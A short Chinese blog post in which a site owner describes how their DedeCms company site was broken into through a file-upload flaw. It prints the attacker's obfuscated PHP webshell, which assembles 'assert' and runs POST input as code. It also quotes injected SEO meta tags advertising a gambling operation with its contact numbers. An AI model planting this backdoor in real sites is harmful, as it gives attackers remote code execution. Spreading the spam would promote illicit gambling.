无意中发现自己的企业站,发现自己的网站TKD被改掉了,知道自己网站被入侵了,赶紧修补。

发现DedeCms后台被入侵的路径include/dialog/select_soft_post.php

1.dedecms任意文件上传漏洞


2.我的企业站被上传的小马

3.关于dedemcs任意文件上传漏洞的修复


关于入侵者上传的代码: 

<?php
error_reporting(0);
$b="zxczxczxczxczxcxzczx";
function  yuag_array($b,$c){
$b=strrev($b);
array_map(substr_replace($b, 'ss', 1, 0),array($c));
}
yuag_array("trea",$_POST['a']);

这个畜生修改了我的TKD

<title>缅甸维加斯国际_18187099992维加斯集团</title>
<meta name="description" content="维加斯国际_娱乐_电话:【微信同号 181-8709-9992】-->>【维加斯点击|注 册】<<--缅甸维加斯国际--> 【www.wjs999.net】<<--维加斯国际-- >>〖客服在线QQ:3318840396〗开户享受 0.9洗码_诚招代理商微信电话_返点 10%-20%】官方直营,维加斯客服热线电 话:18187099992 ,公平、公正、公开,详 情咨询加斯客服" />
<meta name="keywords" content="维加斯娱乐,缅甸维加斯注册,缅甸维 加斯登录,缅甸维加斯客服,缅甸维加斯电 话,维加斯客服电话,维加斯客服热线" />

畜生啊!这是人做的事情吗?